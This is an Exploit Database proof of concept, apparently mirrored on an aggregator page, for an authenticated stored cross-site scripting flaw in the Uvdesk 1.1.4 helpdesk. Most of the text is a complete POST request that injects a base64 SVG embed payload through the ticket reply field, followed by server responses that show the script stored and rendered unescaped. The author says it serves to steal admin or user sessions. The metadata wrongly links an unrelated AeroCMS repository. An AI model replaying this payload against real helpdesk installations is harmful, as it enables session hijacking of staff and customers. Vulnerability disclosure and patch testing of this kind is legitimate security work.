Uvdesk 1.1.4 – Stored XSS (Authenticated)

• Exploit Database
• 132 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51696/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated) # Date: 14/08/2023 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://www.uvdesk.com/ # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 1.1.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23   # Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.   ## Example XSS Stored in new ticket   ----------------------------------------------------------------------------------------------------------------------- Param: reply ----------------------------------------------------------------------------------------------------------------------- Req -----------------------------------------------------------------------------------------------------------------------   POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1 Host: 127.0.0.1 Content-Length: 812 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3 Connection: close   ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="threadType"   forward ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="status"     ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="subject"   aaaa ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="to[]"   test@local.host ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="reply"   %3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E   ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="pic"; filename="" Content-Type: application/octet-stream     ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="nextView"   stay ------WebKitFormBoundaryXCjJcGbgZxZWLsSk--     ----------------------------------------------------------------------------------------------------------------------- Res: -----------------------------------------------------------------------------------------------------------------------   HTTP/1.1 302 Found Date: Mon, 14 Aug 2023 11:33:26 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Location: /uvdesk/public/en/member/ticket/view/1 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: bf1b73 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:33:26 GMT Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 398   <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url=&apos;/uvdesk/public/en/member/ticket/view/1&apos;" />   <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title> </head> <body> Redirecting to <a href="https://www.exploit-db.com/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>. </body> </html> ----------------------------------------------------------------------------------------------------------------------- Redirect and view response: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Mon, 14 Aug 2023 11:44:14 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: 254ce8 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:44:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 300607   <!DOCTYPE html> <html> <head> <title>#1 vvvvvvvvvvvvvvvvvvvvv</title> [...] <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p> [...] -----------------------------------------------------------------------------------------------------------------------   XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.